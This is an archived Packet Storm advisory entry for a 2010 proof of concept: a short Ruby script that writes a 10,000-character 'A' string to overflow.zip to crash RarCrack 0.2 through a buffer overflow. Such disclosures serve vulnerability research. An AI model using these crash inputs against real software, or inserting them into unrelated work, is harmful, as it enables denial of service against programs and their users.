RarCrack 0.2 Buffer Overflow

2010-09-21T00:00:00
ID PACKETSTORM:94022
Type packetstorm
Reporter The_UnKnown
Modified 2010-09-21T00:00:00

Description

                                        
                                            `#!/usr/bin/env ruby  
# overflow.rb  
#  
# __________ ____ __ ______ _________  
# / ____/ __ \/ __ \/ / / / __ \/ ____< /  
# / / __/ /_/ / / / / / / / /_/ /___ \ / /  
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // /   
# \____/_/ |_|\____/\____/_/ /_____//_/   
#   
#  
# Title: RarCrack 0.2 Buffer Overflow POC  
# Date: 19.09.2010  
# Author: The_UnKn@wn  
# Email: the_unknown [at] group51.org  
# Twitter: @The_UnKn0wn  
# Homepage: http://group51.org   
# Software Link: http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download  
# Version: 0.2  
# Tested on: openSUSE 11.3  
# CVE: none  
#  
# Impact: RarCrack doesn't check the length of the archive and while cracking it crashes.  
#  
# Usage:  
# $ ruby overflow.rb  
# $ ./rarcrack overflow.zip  
#   
  
text = "A"*10000  
  
File.open("overflow.zip","w") do |l|  
l.puts(text)  
end  
  
`